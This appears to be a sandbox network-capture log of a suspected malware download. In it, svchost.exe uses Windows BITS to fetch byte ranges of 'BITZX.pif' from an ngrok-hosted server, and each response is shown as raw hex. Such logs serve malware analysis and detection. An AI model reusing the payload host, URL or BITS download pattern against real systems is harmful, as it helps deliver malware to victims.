        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:37 UTC205INData Raw: 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 22 00 14 a5 7b 00 00 02 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00
        Data Ascii: *.(C(9****0***0*0*.(C(9****0*"{*0**0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        62192.168.11.20497763.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:39 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=14827-14960
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:39 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 134
        Content-Range: bytes 14827-14960/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:38 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:39 UTC134INData Raw: 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13
        Data Ascii: **0**0**0*0*.(C(9****


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        63192.168.11.20497773.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:42 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=14961-15170
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:42 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 210
        Content-Range: bytes 14961-15170/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:42 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:42 UTC210INData Raw: 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 22 00 14 a5 b9 00 00 01 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 22 00 14 a5 a3 00 00 01 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43
        Data Ascii: 0**0***"*0**0****0*"*0***0*.(C


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        64192.168.11.20497783.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:46 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=15171-15739
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:46 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 569
        Content-Range: bytes 15171-15739/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:45 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:46 UTC569INData Raw: f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 17 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00
        Data Ascii: (9****0**0**0*0*.(C(9******0*0*.(C(9****0*0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        65192.168.11.20497793.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:49 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=15740-16188
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:49 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 449
        Content-Range: bytes 15740-16188/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:48 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:49 UTC449INData Raw: 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00
        Data Ascii: *0*0*.(C(9****0**0**0**0**0**0*0*.(C(9***


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        66192.168.11.20497803.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:52 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=16189-16254
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:52 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 66
        Content-Range: bytes 16189-16254/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:51 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:52 UTC66INData Raw: 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28
        Data Ascii: ****0*0*.(C(


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        67192.168.11.20497813.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:55 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=16255-16394
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:55 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 140
        Content-Range: bytes 16255-16394/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:55 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:55 UTC140INData Raw: 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03
        Data Ascii: 9******0*0*.(C(9****0**0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        68192.168.11.20497823.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:57 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=16395-16637
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:57 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 243
        Content-Range: bytes 16395-16637/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:57 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:57 UTC243INData Raw: 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06
        Data Ascii: **0**0*0*.(C(9****0**0*0*.(C(9****0*0*.(C


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        69192.168.11.20497833.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:59 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=16638-17045
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:59 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 408
        Content-Range: bytes 16638-17045/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:58 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:59 UTC408INData Raw: 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04
        Data Ascii: (9****0**0**0**0**0*0*.(C(9****0**0*0*0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        70192.168.11.20497843.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:02 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=17046-17172
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:02 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 127
        Content-Range: bytes 17046-17172/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:02 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:02 UTC127INData Raw: 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00
        Data Ascii: C(9****0**0**0***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        71192.168.11.20497853.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:04 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=17173-17342
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:04 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 170
        Content-Range: bytes 17173-17342/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:04 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:04 UTC170INData Raw: 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03
        Data Ascii: *.(C(9****0*0*.(C(9*****0*.(C(9****0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        72192.168.11.20497863.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:07 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=17343-17568
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:07 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 226
        Content-Range: bytes 17343-17568/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:07 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:07 UTC226INData Raw: 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5
        Data Ascii: ***0*.(C(9****0**0**0******0*0*.(C(9


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        73192.168.11.20497873.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:10 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=17569-17711
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:10 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 143
        Content-Range: bytes 17569-17711/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:09 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:10 UTC143INData Raw: 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14
        Data Ascii: ****0*0*.(C(9*****0*.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        74192.168.11.20497883.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:13 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=17712-17754
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:14 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 43
        Content-Range: bytes 17712-17754/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:12 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:14 UTC43INData Raw: 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00
        Data Ascii: **0*0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        75192.168.11.20497893.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:17 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=17755-18245
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:18 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 491
        Content-Range: bytes 17755-18245/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:17 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:18 UTC491INData Raw: 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 14 2a 00
        Data Ascii: *.(C(9***.(C(9******0***0*.(C(9****0*0*.(C(9***.(C(9*.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        76192.168.11.20497903.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:21 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=18246-18701
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:22 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 456
        Content-Range: bytes 18246-18701/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:21 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:22 UTC456INData Raw: 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13
        Data Ascii: **0***0*0*.(C(9****0*0*.(C(9****0*0*.(C(9****


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        77192.168.11.20497913.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:25 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=18702-19130
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:26 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 429
        Content-Range: bytes 18702-19130/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:26 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:26 UTC429INData Raw: 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04
        Data Ascii: ***0*.(C(9****0***0*0*.(C(9****0*0*.(C(9****0


